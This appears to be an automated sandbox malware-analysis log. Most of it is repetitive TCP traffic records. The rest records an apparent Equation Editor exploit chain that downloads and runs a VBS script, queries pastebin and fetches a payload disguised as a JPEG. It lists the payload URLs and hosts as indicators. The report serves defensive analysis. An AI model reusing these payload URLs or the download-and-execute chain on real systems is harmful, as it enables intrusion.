Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 5.182.211.151:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 5.182.211.151:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.19.24:443
Source: global traffic	TCP traffic: 172.67.19.24:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49165

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe	Domain query: pastebin.com
Source: C:\Windows\SysWOW64\wscript.exe	Network Connect: 172.67.19.24 443			Jump to behavior

Connects to a pastebin service (likely for C&C)

Source: unknown	DNS query: name: pastebin.com
Source: unknown	DNS query: name: pastebin.com
Source: unknown	DNS query: name: pastebin.com

Yara detected Generic Downloader

Source: Yara match	File source: 8.2.powershell.exe.95d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.468489304.00000000095D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_0356043D URLDownloadToFileW,ShellExecuteExW,ExitProcess,

2_2_0356043D

Source: word.vbs.9.dr	Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
Source: word.vbs.9.dr	Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4

Source: global traffic	HTTP traffic detected: GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1Host: uploaddeimagens.com.br

Source: Joe Sandbox View	IP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox View	IP Address: 172.67.215.45 172.67.215.45

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: SKB-ENTERPRISENL SKB-ENTERPRISENL
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: global traffic	HTTP traffic detected: GET /raw/yk0CXsC5 HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jimbo/prnportjjm.vbs HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: blessy.ydns.euConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.22:49165 version: TLS 1.0

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_0356043D URLDownloadToFileW,ShellExecuteExW,ExitProcess,

2_2_0356043D

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\prnportjjm[1].vbs

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /raw/yk0CXsC5 HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1Host: uploaddeimagens.com.br
